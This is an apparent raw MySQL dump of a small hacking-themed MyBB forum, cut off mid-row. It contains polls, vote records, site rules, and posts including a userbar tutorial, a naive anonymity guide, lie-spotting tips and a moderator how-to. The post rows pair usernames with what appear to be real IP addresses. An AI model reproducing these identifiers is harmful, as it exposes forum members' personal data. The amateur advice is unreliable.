varchar(200) NOT NULL, description text NOT NULL, forums text NOT NULL, type char(1) NOT NULL, postoptions text NOT NULL, threadoptions text NOT NULL, PRIMARY KEY (tid) ); INSERT INTO mybb_modtools VALUES('1', 'Junk ', 'A tool to automatically junk threads.', '', 't', '', 'a:14:{s:12:\"deletethread\";s:1:\"0\";s:12:\"mergethreads\";s:1:\"0\";s:10:\"deletepoll\";s:1:\"0\";s:15:\"removeredirects\";s:1:\"0\";s:13:\"approvethread\";s:0:\"\";s:10:\"openthread\";s:5:\"close\";s:10:\"movethread\";i:19;s:18:\"movethreadredirect\";s:1:\"0\";s:24:\"movethreadredirectexpire\";i:0;s:10:\"copythread\";i:0;s:10:\"newsubject\";s:15:\"[Junk]{subject}\";s:8:\"addreply\";s:29:\"This thread has been junked. \";s:12:\"replysubject\";s:9:\"{subject}\";s:12:\"threadprefix\";i:0;}'); DROP TABLE IF EXISTS mybb_mycode; CREATE TABLE mybb_mycode ( cid int(10) unsigned NOT NULL auto_increment, title varchar(100) NOT NULL, description text NOT NULL, regex text NOT NULL, replacement text NOT NULL, active int(1) NOT NULL, parseorder smallint(5) unsigned NOT NULL, amp_groups varchar(100) NOT NULL, amp_nogroups varchar(100) NOT NULL, amp_vgroups varchar(100) NOT NULL, amp_vreplace text NOT NULL, amp_forums varchar(100) NOT NULL, amp_noforums varchar(100) NOT NULL, amp_closed int(10) NOT NULL, amp_sticky int(10) NOT NULL, amp_other int(10) NOT NULL, amp_mod int(10) NOT NULL, amp_fmod int(10) NOT NULL, amp_admin int(10) NOT NULL, PRIMARY KEY (cid) ); INSERT INTO mybb_mycode VALUES('3', 'Twitter ', '', '\\[twitter\\](.*?)\\[/twitter\\]', 'Follow @$1\r\n', '1', '0', '', '', '', '', '', '', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_mycode VALUES('5', 'Staff Message', 'Staff Message for only the Forum Staff', '\\[mod\\](.*?)\\[/mod\\]', '

    \"\"/ $1

    \r\n', '1', '0', '3,4,6', '1,2,9,5,7,8,10,12,13,14,15,16,17,18,20', '1,2,9,3,4,5,6,7,8,10,12,13,14,15,16,17,18,20', '', '1,3,50,49,4,5,2,48,19,6,7,56,42,47,65,64,9,8,10,11,12,59,13,14,46,15,20,21,16,17,18,43,51,69,52,53,6', '', '0', '0', '0', '1', '1', '1'); INSERT INTO mybb_mycode VALUES('6', 'Google Search', 'Google Search', '\\[gsearch\\](.*?)\\[/gsearch\\]', 'Google Search For: $1', '1', '0', '1,2,9,3,4,5,6,7,8,10,12,13,14,15,17,20,21', '', '1,2,9,3,4,5,6,7,8,10,12,13,14,15,17,20,21', '', '1,3,50,49,4,5,2,48,19,6,7,56,83,42,47,65,64,9,8,10,11,12,59,13,14,46,15,20,21,16,17,18,43,51,69,52,5', '', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_mycode VALUES('7', 'Highlight Text', 'Highlight Text with any color of your choice.', '\\[hl=(.*?)\\](.*?)\\[/hl\\]', '\r\n$2', '1', '0', '', '', '', '', '', '', '0', '0', '0', '0', '0', '0'); DROP TABLE IF EXISTS mybb_mypermissions_actions; CREATE TABLE mybb_mypermissions_actions ( aid int(10) unsigned NOT NULL auto_increment, file varchar(100) NOT NULL, action varchar(100) NOT NULL, description varchar(300) NOT NULL, usergroups varchar(300) NOT NULL, PRIMARY KEY (aid) ); DROP TABLE IF EXISTS mybb_polls; CREATE TABLE mybb_polls ( pid int(10) unsigned NOT NULL auto_increment, tid int(10) unsigned NOT NULL, question varchar(200) NOT NULL, dateline bigint(30) NOT NULL, options text NOT NULL, votes text NOT NULL, numoptions smallint(5) unsigned NOT NULL, numvotes smallint(5) unsigned NOT NULL, timeout bigint(30) NOT NULL, closed int(1) NOT NULL, multiple int(1) NOT NULL, public int(1) NOT NULL, PRIMARY KEY (pid) ); INSERT INTO mybb_polls VALUES('1', '345', 'Which one looks better?', '1346962424', 'First one||~|~||Second one', '3||~|~||2', '2', '5', '0', '0', '0', '0'); INSERT INTO mybb_polls VALUES('2', '462', 'Which one?', '1347848288', 'First one||~|~||Second one||~|~||Third one', '3||~|~||0||~|~||0', '3', '3', '0', '0', '0', '0'); INSERT INTO mybb_polls VALUES('3', '767', 'Do you cheat/hack in games?', '1349702575', 'Yes||~|~||No! Hackers are noobs!', '5||~|~||1', '2', '6', '0', '0', '0', '1'); INSERT INTO mybb_polls VALUES('4', '889', 'Pick a theme (Can multi vote)', '1350361933', 'Theme 1||~|~||Theme 2||~|~||Theme 3', '6||~|~||0||~|~||2', '3', '8', '0', '0', '1', '0'); DROP TABLE IF EXISTS mybb_pollvotes; CREATE TABLE mybb_pollvotes ( vid int(10) unsigned NOT NULL auto_increment, pid int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, voteoption smallint(5) unsigned NOT NULL, dateline bigint(30) NOT NULL, PRIMARY KEY (vid), KEY pid (pid,uid) ); INSERT INTO mybb_pollvotes VALUES('1', '1', '61', '1', '1346963758'); INSERT INTO mybb_pollvotes VALUES('2', '1', '112', '1', '1346992039'); INSERT INTO mybb_pollvotes VALUES('3', '1', '67', '2', '1347277719'); INSERT INTO mybb_pollvotes VALUES('4', '1', '82', '1', '1347305088'); INSERT INTO mybb_pollvotes VALUES('5', '1', '1', '2', '1347646718'); INSERT INTO mybb_pollvotes VALUES('6', '2', '82', '1', '1347913050'); INSERT INTO mybb_pollvotes VALUES('7', '2', '2', '1', '1347938294'); INSERT INTO mybb_pollvotes VALUES('8', '2', '194', '1', '1348108337'); INSERT INTO mybb_pollvotes VALUES('9', '3', '53', '1', '1349702580'); INSERT INTO mybb_pollvotes VALUES('10', '3', '82', '1', '1349703624'); INSERT INTO mybb_pollvotes VALUES('11', '3', '62', '1', '1349713370'); INSERT INTO mybb_pollvotes VALUES('12', '3', '214', '1', '1349827896'); INSERT INTO mybb_pollvotes VALUES('13', '3', '61', '2', '1350058590'); INSERT INTO mybb_pollvotes VALUES('14', '3', '257', '1', '1350113681'); INSERT INTO mybb_pollvotes VALUES('15', '4', '228', '1', '1350389624'); INSERT INTO mybb_pollvotes VALUES('16', '4', '3', '1', '1350426612'); INSERT INTO mybb_pollvotes VALUES('17', '4', '1', '1', '1350429103'); INSERT INTO mybb_pollvotes VALUES('18', '4', '2', '3', '1350449102'); INSERT INTO mybb_pollvotes VALUES('19', '4', '257', '1', '1350612477'); INSERT INTO mybb_pollvotes VALUES('20', '4', '222', '1', '1350624459'); INSERT INTO mybb_pollvotes VALUES('21', '4', '62', '1', '1350633319'); INSERT INTO mybb_pollvotes VALUES('22', '4', '53', '3', '1350641764'); DROP TABLE IF EXISTS mybb_posts; CREATE TABLE mybb_posts ( pid int(10) unsigned NOT NULL auto_increment, tid int(10) unsigned NOT NULL, replyto int(10) unsigned NOT NULL, fid smallint(5) unsigned NOT NULL, subject varchar(120) NOT NULL, icon smallint(5) unsigned NOT NULL, uid int(10) unsigned NOT NULL, username varchar(80) NOT NULL, dateline bigint(30) NOT NULL, message text NOT NULL, ipaddress varchar(30) NOT NULL, longipaddress int(11) NOT NULL, includesig int(1) NOT NULL, smilieoff int(1) NOT NULL, edituid int(10) unsigned NOT NULL, edittime int(10) NOT NULL, visible int(1) NOT NULL, posthash varchar(32) NOT NULL, disableeditedby int(1) NOT NULL, edittime2 int(10) NOT NULL, PRIMARY KEY (pid), KEY tid (tid,uid), KEY uid (uid), KEY visible (visible), KEY dateline (dateline), KEY longipaddress (longipaddress), KEY message (message) ); INSERT INTO mybb_posts VALUES('1', '1', '0', '2', 'tggfg', '0', '1', 't3h jok3r', '1339740375', 'drffgjdf', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '8ef418a68d9a831d2b5eba10ab28dead', '0', '0'); INSERT INTO mybb_posts VALUES('2', '1', '1', '2', 'RE: tggfg', '0', '3', '??????????¢™', '1339904895', 'gdasagdndfgajngarbagg lmnop', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'e102c09c72f978cfe0276e67ddeb49d4', '0', '0'); INSERT INTO mybb_posts VALUES('3', '9', '0', '19', 'tggfg', '0', '2', 'Apathy', '1339907807', 'sdafasdfasdfsadfsgsfgf', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '932ea58f77ef2363cb331456f9359b77', '0', '0'); INSERT INTO mybb_posts VALUES('4', '2', '0', '34', 'Userbar tut', '0', '2', 'Apathy', '1339911671', 'This is extremely easy to make. I guarantee that [i]anyone[/i] will be able to make their own user bars after this tutorial. Also it\'s my first tutorial, so be gentle.\n\n[color=#1E90FF][size=medium]Requirements:[/size][/color]\n\n1. Adobe Photoshop (Any will do, but I made mine with CS5 Portable)\n\n2. Font named \"Kremlin Bolshevik\"\n( You can download it here for free: http://www.dafont.com/kremlin-bolshevik.font )\n\n3. The LF Userbar Template.\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png[/IMG]\n\n\n[color=#1E90FF][size=medium]Getting Started:[/size][/color]\nNow that you have all the requirements, let\'s get started.\n\n\n[color=#87CEFA][size=medium]1.[/size][/color] First you\'ll want to open up the template in Photoshop. \n\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step1.png[/IMG]\n[/spoiler]\n\n\n[color=#87CEFA][size=medium]2.[/size][/color] Next, you\'ll want to go to your Type Tool and set the settings. \nChange the font to \"Kremlin Bolshevik\", font size to about 18 px. depending on how long your text will be, and change the text color to #333333.\nNow you\'ll want to write your text. In my case it\'s \"Psycho\". You\'ll also want to play around with the capitalization of the text to get a different form of each letter.\n\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step-2.png[/IMG]\n[/spoiler]\n\n\n[color=#87CEFA][size=medium]3.[/size][/color] Now we want to edit our text layer. So double-click on the text layer in the layers palette to the right to bring up the \"Layer Style\".\nWe will add a Drop Shadow and a Stroke to our text.\nFor the Drop Shadow use 50% Opacity and the angle at 90°. Leave the rest at default.\nAs for the Stroke size use 1 px and the color at #989898. Leave the rest at default.\n\nDrop Shadow:\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/drop-shadow.png[/IMG]\n[/spoiler]\n\nStroke:\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/stroke.png[/IMG]\n[/spoiler]\n\n\n[color=#87CEFA][size=medium]4.[/size][/color] Now your text should look something like this:\n\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step-4.png[/IMG]\n[/spoiler]\n\n\n[color=#87CEFA][size=medium]5.[/size][/color] Now it\'s time to look for an icon. For this it\'s up to you on what to use.\nI like going over to http://www.iconfinder.com/ because they have some really nice free icons. Alternatively, you can do a quick \"Google\" search.\nOnce you find an icon you like, save it as a .PNG.\n\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step-5.png[/IMG]\n[/spoiler]\n\n\n[color=#87CEFA][size=medium]6.[/size][/color] Now we place our icon and re-size if needed.\n\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step6.png[/IMG]\n[/spoiler]\n\n\n[color=#87CEFA][size=medium]7.[/size][/color] To save it we want to \"Save for Web & Devices\". (You may also want to save a .PSD for editing later on.)\n\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step7.png[/IMG]\n[/spoiler]\n\n\n[color=#87CEFA][size=medium]8.[/size][/color] After you click on \"Save for Web & Devices\", a window like this will pop up. You\'ll want to make sure you save the file as a PNG-24 for higher quality. Also make sure you have the \"Transparency\" box ticked. Then click on \"Save\".\n\n[spoiler]\n[IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step8.png[/IMG]\n[/spoiler]\n\n[color=#1E90FF][size=large]I hope you enjoyed my tutorial. If you have any extra questions please feel free to send me a PM.[/size][/color]\n\n\nCredits: Darko™', '173.206.128.200', '-1378975544', '0', '0', '1', '1345133407', '1', '4bea56debad64f3a2a1c1db64c3aee24', '0', '1345133407'); INSERT INTO mybb_posts VALUES('322', '2', '4', '34', 'RE: Userbar tut', '0', '67', 'HoverCatz', '1345133839', 'This tut is mega awesome! :D', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '70cb1786fec3287f2c2ee46cc88738f3', '0', '0'); INSERT INTO mybb_posts VALUES('22', '3', '7', '19', 'RE: Official Site Rules', '0', '1', 't3h jok3r', '1340037325', 'Nice rules. They have been added to the rule help document.\r\n\r\nhttp://l33thacking.com/misc.php?action=help&hid=8', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '98901bb9d9e7ad81eace2a73f534943c', '0', '0'); INSERT INTO mybb_posts VALUES('6', '2', '4', '34', 'RE: userbar tut', '0', '1', 't3h jok3r', '1339969940', 'Thanks for releasing LH userbar tutorial so others can use it to make some for themselves or their groups on LH.', '72.229.164.105', '1223009385', '1', '0', '1', '1343948445', '1', '81ebfb07c2fca4cb60004456a03a5271', '0', '1343948445'); INSERT INTO mybb_posts VALUES('7', '3', '0', '19', '[Junk]Official Site Rules', '0', '3', '??????????¢™', '1339989731', '[b][u][align=center][color=#1E90FF][size=x-large]These are the official LH site rules[/size][/color][/align][/u][/b]\r\n\r\n[align=center][b][size=medium][color=#1E90FF]1.[/color] Members are not allowed to engage in threatening behavior toward other members. This includes flaming. Also threats to steal accounts, dox, or swat. This includes any on-site material such as posts, PMs, or profiles.\r\n\r\n[color=#1E90FF]2.[/color] No short, low quality posts like \"bump\", \"lol\", \"roflmao\", \"thanks\", \"Troll\" and any repeated characters to defeat the min character count.\r\n\r\n[color=#1E90FF]3.[/color] Don\'t attempt to infect members with trojans, viruses, or backdoors.\r\n\r\n[color=#1E90FF]4.[/color] No direct links to infected downloads in posts or profiles.\r\n\r\n[color=#1E90FF]5.[/color] No posting of personal information that isn\'t yours. Privacy is to be respected here. This includes any passwords, logins or dumps.\r\n\r\n[color=#1E90FF]6.[/color] You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\".\r\n\r\n\r\n[color=#1E90FF]7.[/color] No adult images, adult links, or adult account trading.\r\n\r\n[color=#1E90FF]8.[/color] Multiple accounts will not be allowed unless you are reporting your original account as hacked. Ban evading will result in the permanent closing of your old account and new accounts. No exceptions.\r\n\r\n[color=#1E90FF]9.[/color] Advertising of competing sites is not allowed. This refers to hacking sites related to LH. Websites without forums or forums unrelated to hacking are acceptable. Advertising includes signatures, PMs, profiles, and posts.\r\n\r\n[color=#1E90FF]10.[/color] No posting of fake programs.\r\n\r\n[color=#1E90FF]11.[/color] No threads or posts for donation begging. This includes loan requests.\r\n\r\n\r\n[color=#1E90FF]12.[/color] No political or religious expression in your profile. This includes user titles, signatures, and avatars.\r\n\r\n[color=#1E90FF]13.[/color] We do not allow site goals or achievements in signature this includes but not limited to posts, reputation, upgrades, and groups memberships.\r\n\r\n[color=#1E90FF]14.[/color] Any rules posted in the forums header must also be reviewed. Some forums have special policies that must be adhered to. Don\'t post in any forum without reading them.[/size][/b][/align]\r\n\r\n[align=center][size=small]If you have any further questions feel free to PM me or any other admin.[/size][/align]', '75.22.48.94', '1259745374', '1', '0', '3', '1350151595', '1', 'c6b573234d46116748b4b0bdba48cae3', '0', '1350151595'); INSERT INTO mybb_posts VALUES('8', '4', '0', '12', 'How to stay anonymous and how to protect your info over the internet (basics)', '0', '2', 'Apathy', '1339990220', '[b][color=#1E90FF][size=large]\r\nWhat is a VPN?[/size][/color][/b]\r\n\r\nA VPN is a program that changes your ip to a proxy ip for a temporary time over the internet.\r\n\r\nSome VPN links/download links:\r\n[spoiler]\r\nhttp://hotspotshield.com/\r\nhttp://vpnreactor.com/ (I RECOMMEND THIS ONE SINCE IT KEEPS NO HISTORY)\r\nhttp://proxpn.com/\r\nhttp://cyberghostvpn.com/en/product/download.html\r\n[/spoiler]\r\n\r\n[color=#32CD32][i]**links to all the VPNS above are FREE and its hard to find a free vpn so try using any one of them and i recommand hotspotshield and hidemyass.com[/i][/color]\r\n\r\n[size=large][b][color=#9400D3]When should i use a VPN?[/color][/b][/size]\r\n\r\nWhenever you are doing a blackhat/whitehat activity,to log on to any form,when logging on to your ONLINE BANKING ACCOUNT including facebook and many other sites [b]basically use a vpn every single time to go on the internet because anyone can get your ip easily and track down your history and if you use a proxy then it will be hard to track your history.[/b]Sometimes admins from forums pick a random ip from any user and misuse it so if you use a vpn you wont get tracked.\r\n\r\n[b][size=large][color=#FF0000]Some sites have proxy IPs blocked,what should i do?\r\n[/color][/size][/b]\r\n\r\nIf your proxy ip is blocked as well then no need to worry log on and do whatever you want but when you log out remember to clear all your history including saved passwords and never keep saved passwords on pc/mac or on the browser.**Remember delete it everyday and if your online on for example 11:59 pm then delete it before it gets to 12:00 AM and then delete it again before logging off (JUST TO STAY ON THE SAFE SIDE)\r\n\r\n[b][color=#FFD700][size=large]Registering on a website!\r\n[/size][/color][/b]\r\n\r\nWhen registering on any site remember to never put your real email id,just make a spare one and use that one to j0in every single site except facebook.Because then you will be getting alot of spam/newsletters and if any off the email contains a virus or a hacking program than you would get hacked so use a spare one even if someone from another forum tries to hack you they will hack a useless account and will get nothing out of it.\r\n\r\n[b][color=#696969][size=large]Chatting with a friend[/size][/color][/b]\r\n\r\nRemember if your friend is asking you a weird question or a bunch of questions then dont reply back because their trying to make you spill out the answers to your security questions etc.\r\n\r\n[color=#8B4513][size=large][b]Creating your spare or any email id[/b][/size][/color]\r\n\r\nAlways enter a wrong date or answer to your security questions such as if your DOB is 9/27/11 then change it to 9/27/10 and for security questions enter a name that you only know about or a location that is UNKNOWN and DONT TELL YOUR FRIENDS THAT YOU KNOW THAT LOCATION AND [b]NEVER ADD A ANSWER RELATED TO YOUR PERSONAL LIFE[/b].\r\n\r\n[b][color=#FF1493][size=large]Facebook,Youtube,Myyearbook etc[/size][/color][/b]\r\n\r\nIn your about me or info section just enter your first REAL name and any fav thing you would like to share and tell them to pm you for more info and never display your phone number/email id and try to keep the best and the highest security level possible for the account and if you notice that a websites giving you problems to log in or load then delete your account then it means that the site is getting attacked unless you believe it safe to be on that site. DONT WORRY HF IS A PROTECTED SITE SO YOUR SAFE :D.\r\n\r\n[color=#1E90FF][size=large][b]Re Login pop outs\r\n[/b][/size][/color]\r\n\r\nIf you were logged in a site and if you click on a link or something and you go to another page and it asks you to retype the username and password DONT ENTER! because the chances are high for it for being a phishing site(NOT ALLOWED TO TALK ABOUT IT SO SEARCH IT UP ON GOOGLE . COM [WITHOUT SPACES])\r\n\r\n[b][size=large][color=#8B4513]Downloading Something from the internet[/color][/size][/b]\r\n\r\nIf you plan to download something from anyone except your family member than do a scan on the file to check if it has a virus or not and to check if it has a hacking program crypted in it.\r\n\r\n[u]1)Check it out from the email service your using.\r\n2)go to this site to check it out [/u][spoiler]http://my-avscan.net/ or go here http://www.sandboxie.com/[/spoiler][u]\r\n3)if you want then run your installed antivirus software of your pc/mac.[/u]\r\n\r\n[color=#32CD32]Here was a short tut about how to stay anonymous and protect your identity over the internet.(THIS TUT CONTAINED BASIC INFO)\r\n\r\nHope you liked it and if you have any questions then feel free to pm me or leave a comment below.[/color]', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '7cfd19c6634822982ab058e324267f72', '0', '0'); INSERT INTO mybb_posts VALUES('11', '4', '8', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '3', '??????????¢™', '1339991371', 'This is a great tutorial you got there OP, Hopefully it will help some people out.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'c7530f9e49f004dfab6cc86ab415b97d', '0', '0'); INSERT INTO mybb_posts VALUES('12', '5', '0', '16', 'How to spot a liar', '0', '2', 'Apathy', '1339991477', '[size=large][color=#FF0000]Body Language[/color][/size]\r\n\r\n•When people lie there expressions are not usually too expressive and will tend not move there arms and hands alot or they fidget to much and move nonstop.\r\n\r\n•They will avoid eye contact or keep to much eye contact .\r\n\r\n•Scratching there noses or behind the ears and constantly touching there face, mouth or throat is a pretty good indicator that they are probably lying.\r\n\r\n•Some one who purse\'s there lips alot can indicate withholding information, extreme anxiety or withholding aggression. When someones lips become dry and they keep licking there lips it indicates that you are nervous.\r\n\r\n• Another thing to look out for is if let\'s say John, John\'s best friend just died and yet John when asked if he is sad he says yes while smiling. He is probably not telling the truth.\r\n\r\n• When someone lies they are not comfortable with silence because that means they do not know if there lie was accepted or not. So if you suspect someone of lying don\'t reply and see what there reactions are.\r\n\r\n[size=large][color=#FFA500]Reactions Of a liar[/color][/size]\r\n\r\n•When some one is innocent he/she will often go on the offensive but a guilty person usually gets defensive.\r\n\r\n•Liars usually place there feet facing towards a exit.\r\n\r\n• A liar usually tries to distance themselves from you by putting something in-between you and him/her.\r\n\r\n•A liar will usually be uncomfortable when being questioned or accused and may turn away or turn his head away from the person.\r\n\r\n•Liars(well basically every one) tend to look up to the right to think,visualize or create a new responce. So look out for that.\r\n\r\n[size=large][color=#32CD32]Verbal speech and context[/color][/size]\r\n\r\n•A liar will usually answer your question with your question. \r\nExample:\r\nYou: Did you eat my sandwich?\r\nLiar: No, I did not eat your sandwich\r\n\r\n•Liars usually go into much too much detail that they would not usually say.\r\n\r\n•Liars have longer pauses and shorter answers and longer times between a question and a response compared to some one who is just nervous.\r\n\r\n• A almost sure fire way to know if they are lying is if they answer questions that have not been asked and over answer question that have been answered.\r\n\r\n• Liars tend to use negative\'s rather then positive\'s. They may say stuff like \'I am not a liar\r\nwhile some one honest would more likely say \' I am a honest person\'.\r\n\r\n[size=large][color=#1E90FF]Tricks of a liar[/color][/size]\r\n\r\n•A good way to spot a liar is if you are accusing him/her, he/she will accuse you of the thing you are accusing them of in order to get the heat taken off of themselves. Even people that know this trick still get caught by it because you will become defensive yourself and explain that you have done nothing.\r\n\r\n• Say some one was accused of cheating, the liar might reply with something like \'\' I have never slept with that woman\'\' .\r\nexplanation of that^ what liars will do is try to distance themselves from whatever they are lying about.\r\n\r\n[size=large][color=#FF1493]A few tests to see if some one is Lying to you[/color][/size]\r\n\r\n•Change the topic and see how easily the liar reacts such as relaxing and looking less stressed.\r\n\r\n• If you think he might be giving fake info ask him little detailed questions. It will probably take him a bit to come up with a answer.\r\n\r\n• Another thing you can do fallowing the trick above is ask him the same question a while later and if the story varies then he/she was lying. \r\n\r\nI am probably going to add more later this I just wanted to get this tut out hope you guys like it :)', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '8e1bf5a75e900e38807a898e2aa44c02', '0', '0'); INSERT INTO mybb_posts VALUES('13', '4', '11', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '1', 't3h jok3r', '1339992181', '[quote=\'??????\' pid=\'11\' dateline=\'1339991371\']\r\nThis is a great tutorial you got there OP, Hopefully it will help some people out.\r\n[/quote]\r\n\r\nI felt like crying. Anyways nice tutorial, thanks for creating it :cool:', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '36e1657133eb7d1673b60482aacfa965', '0', '0'); INSERT INTO mybb_posts VALUES('14', '6', '0', '4', 'Welcome to L33THacking.com', '0', '1', 't3h jok3r', '1339994562', 'Welcome to L33THacking.com.\n\nI am the founder of LH, the current and long term admins of LH are the following.\n\n[list]\n[*] [url=http://l33thacking.com/member.php?action=profile&uid=1]t3h jok3r[/url] :- Incharge of upgrades, help documents, theme and everything else which is NOT listed below.\n[*] [url=http://l33thacking.com/member.php?action=profile&uid=2]Apathy[/url] :- Incharge of reputation abuse and awards.\n[*] [url=http://l33thacking.com/member.php?action=profile&uid=3]??????[/url] :- Incharge of stolen accounts, stickies and bans.\n[/list]\n\nFeel free to contact any staff member anytime. If they are offline and you require immediate assistance or minor issues then please create a thread in the [url=http://l33thacking.com/forumdisplay.php?fid=3]Announcements, Feedback, Bugs and Suggestions[/url] section.', '72.229.164.105', '1223009385', '1', '0', '1', '1340074873', '1', '9fbfa838edde9c2d530e45e8d735045e', '0', '1340074873'); INSERT INTO mybb_posts VALUES('19', '8', '18', '19', '[Junk]test for j', '0', '1', 't3h jok3r', '1339998582', 'This thread has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('18', '8', '0', '19', '[Junk]test for j', '0', '1', 't3h jok3r', '1339998552', 'test for j', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2f3b1fc5f0e962b1efaeadb29c8f959a', '0', '0'); INSERT INTO mybb_posts VALUES('20', '1', '1', '2', 'tggfg', '0', '1', 't3h jok3r', '1339998836', 'This post has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('21', '10', '0', '5', '[tut]How to moderate L33THacking', '0', '1', 't3h jok3r', '1340001648', 'I\'m making a quick tutorial showing how to moderate specific stuff because this can come in handy for new mods. \r\n\r\n[u][b][size=large]Forum Actions[/size][/b][/u]\r\n\r\n[u][b]Split[/u][/b]\r\n\r\nFor example...\r\n\r\nIf someone posted a question and someone else posts their own question in someone elses thread. Then you select the post then go to moderation options and select [i]split thread[/i]. You will basically create a new thread in any forum of your choice. \r\n\r\n[u][b]Junk[/b][/u]\r\n\r\nJunk:- Automatically move a thread to our trash/junk forum. Only move threads that violate LH rules and regulations.\r\n\r\nYou can junk a thread from the thread listing index.\r\n\r\n[spoiler][img]http://img98.imageshack.us/img98/8594/testqx.png[/img][/spoiler]\r\n\r\nHere is an example of the outcome \r\n\r\n[spoiler][img]http://img577.imageshack.us/img577/235/testpf.png[/img][/spoiler]\r\n\r\nSo basically the threads title will change to [junk]TITLE, the moderator who posted it will auto post(this increase their post and we know who did it) and the thread gets closed.\r\n\r\n[u][b]Post Junk[/b][/u]\r\n\r\nYou have to go to the thread, select the post then head down to inline moderation option and select \"junk post\". You can delete posts etc the same way.\r\n\r\n[spoiler][img]http://img39.imageshack.us/img39/5199/testol.png[/img][/spoiler]\r\n\r\nOutcome\r\n\r\nThe post will be moved to the junk and the original post in the thread would be modified to \"This post has been removed due to violation of L33THacking rules.\"\r\n\r\n[size=large][u][b]Account[/b][/u][/size]\r\n\r\nHere is a picture of how it looks when you are a staff member.\r\n\r\n[spoiler][img]http://img855.imageshack.us/img855/8562/testgs.png[/img][/spoiler]\r\n\r\nNow I prefer the repfuck option to repfuck the user under the \"moderator options\" or you can us click on rate>repfuck and enter a custom reason.\r\n\r\nNormally if you do it the easy easy then it would look like this.\r\n\r\n[spoiler][img]http://img824.imageshack.us/img824/9448/testrf.png[/img][/spoiler]\r\n\r\nAnother feature, Goodbyespammer. It\'s a tool that I would suggest you to use when a user is constantly spamming the forums non-stop even after warning. \r\n\r\nHere is a look at it with recommended settings.\r\n\r\n[spoiler][img]http://img72.imageshack.us/img72/5483/testra.png[/img][/spoiler]\r\n\r\nI would select all the options [b]except[/b] the first two which are \"delete threads and posts\". Which also means you would have to junk all their threads and posts but what you can do is go to all threads and all posts and use the inline junk/junk post tool.\r\n\r\nTo Ban you can use any option if you are an admin. Because it doesn\'t matter.\r\n\r\nModcp edit, you can only edit their profile, suspend posting and put them on \"moderate posts\".\r\n\r\nAdmincp edit, you can edit anything.\r\n\r\n[b]Suspend posting[/b] :- Means that the user can\'t post at all, but they can browse the site. I would recommend you to \r\n\r\n[b]Moderate Posts[/b]\r\n\r\nWhen you put someone on moderate posts, then it means that a mod would have to approve/deny all their posts til a specific period. (You can set til when)\r\n\r\nEX.\r\n\r\n[spoiler][img]http://img259.imageshack.us/img259/6451/testwj.png[/img][/spoiler]\r\n\r\nSo basically go to modcp>moderation quenue>you can ignore, delete or approve. I would either delete or approve.\r\n\r\n[size=large][u][b]MODCP[/b][/u][/size]\r\n\r\n[b]Reported posts[/b]\r\n\r\nYou can either click the moderator notice above or go to modcp>reported posts.\r\n\r\nTo remove it from modcp, select it and click on mark selected as read.\r\n\r\n[spoiler][img]http://img710.imageshack.us/img710/1682/testim.png[/img][/spoiler]\r\n\r\nYou will have to visit the thread to take care of the post. So basically click on the thread then go to post 3 as shown in post ID in modcp. Then you can delete, junk or warn member.\r\n\r\n[b]Profile Editor[/b] :- Search for a member and edit their profile.\r\n[b]Banning[/b] :- See which member got banned, when and why also by which mod. Latest bans are at the top.\r\n[b]IP search[/b] :- Find out if someone has multiple accounts on LH.\r\n\r\n[size=large][u][b]Warning [/b][/u][/size]\r\n\r\nYou can warn members via their post or profile. When you click on warn you will be taken to a page similar to this. P.S: You might have more warnings because we updated the warnings.\r\n\r\n[spoiler][img]http://img338.imageshack.us/img338/2383/testxx.png[/img][/spoiler]\r\n\r\nThe admin notes are for admins, you could include a link or proof to let us or the user know why they got a warning. You can choose a reason or add a custom one, if you do then please provide proof in the admin notes.\r\n\r\nYou can choose to send a PM to the member. \r\n\r\nYou know how the warning looks already so I don\'t need to show you that part. But this time there will be a \"view\" option under details. This is how it looks after you click it.\r\n\r\n[spoiler][img]http://img39.imageshack.us/img39/9943/testlu.png[/img[/spoiler]\r\n\r\nTo remove the warning, add a note in the revoke warning then click the revoke button below it. It will only remove the warning you are viewing.\r\n\r\n[b]Bans[/b]\r\n\r\nYou know how to ban a member so I will skip that part.\r\n\r\nTo unban the member, go to modcp>banning>[b]lift ban[/b]\r\n\r\n[size=x-large][b]Merge Users[/b][/size]\r\n\r\nAdmincp>Users and Groups>Merge Users\r\n\r\n[i]Source Account:[/i] Account being merged. (Temp account)\r\n[i]Destination Account: [/i] Account to remain. (Perma account)\r\n\r\nExample: Ladder has 1 rep and 100 posts AND hum has 0 posts so we will merge hum to ladder. Example below.\r\n\r\nSource: hum\r\nDestination: Ladder\r\n\r\nThat\'s all. Let me know if you have any questions.\r\n\r\nP.S: All admin and moderator PMs are logged and are viewable by me only via Admincp so if you fuck around with members or abuse your privileges I will ban you. All grammar and spelling errors are to be ignored in this thread.\r\n\r\nFor admincp, every 